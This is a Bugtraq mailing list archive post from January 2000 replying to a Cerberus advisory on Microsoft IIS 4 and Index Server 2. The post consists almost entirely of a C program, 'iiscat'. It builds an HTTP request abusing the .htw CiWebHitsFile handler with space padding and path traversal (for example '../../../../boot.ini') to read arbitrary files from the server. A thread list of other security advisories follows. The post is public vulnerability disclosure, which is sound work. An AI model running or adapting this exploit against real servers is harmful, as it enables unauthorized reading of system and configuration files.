Bugtraq mailing list archives
Re: Alert: MS IIS 4 / IS 2 (Cerberus Security Advisory CISADV000126)
From: fredrik.widlund () DEFCOM-SEC COM (Fredrik Widlund)
Date: Sun, 30 Jan 2000 19:28:19 +0100
in plain english... /wolf - Defcom Security /* fredrik.widlund () defcom-sec com example: iiscat ../../../../boot.ini */ #include <stdio.h> #include <string.h> int main(int argc, char **argv) { char request[2048], *request_p, *file_read, *file_valid = "/default.htm"; int file_buf_size = 250; if (!((argc == 2 && argv[1] && strlen(argv[1]) < 1024) || (argc == 3 && argv[1] && argv[2] && strlen(argv[1]) <= file_buf_size && strlen(argv[2]) < 1024))) { fprintf(stderr, "usage: iiscat file_to_read [valid_file]\n"); exit(1); } file_read = argv[1]; if (argc == 3) file_valid = argv[2]; sprintf(request, "GET %s", file_valid); request_p = request + strlen(request); file_buf_size -= strlen(file_valid); while(file_buf_size) { strcpy(request_p, "%20"); request_p += 3; file_buf_size--; } sprintf(request_p, ".htw?CiWebHitsFile=%s&CiRestriction=none&CiHiliteType=Full HTTP/1.0\n\n", file_read); puts(request); exit(0); }
Current thread:
- Re: Cobalt RaQ2 - and QUBE2, (continued)
- Re: Cobalt RaQ2 - and QUBE2 Nir Simionovich (Rin Solo) (Jan 29)
- Tempfile vulnerabilities foo (Jan 30)
- [FreeBSD Security Advisory: FreeBSD-SA-00:02.procfs] Patrick Oonk (Jan 28)
- Re: Multicast from hell Omachonu Ogali (Jan 28)
- FTPPro has weird features - Fwd: Important matter for your abuse department Cedric Amand (Jan 28)
- New SCO patches... Aaron Sigel (Jan 27)
- Qpopper security bug Zhodiac (Jan 26)
- Re: S/Key & OPIE Database Vulnerability Dug Song (Jan 26)
- Microsoft Security Bulletin (MS00-006) Microsoft Product Security (Jan 26)
- Alert: MS IIS 4 / IS 2 (Cerberus Security Advisory CISADV000126) Mnemonix (Jan 26)
- Re: Alert: MS IIS 4 / IS 2 (Cerberus Security Advisory CISADV000126) Fredrik Widlund (Jan 30)
- Re: explanation and code for stream.c issues Nathan Ollerenshaw (Jan 21)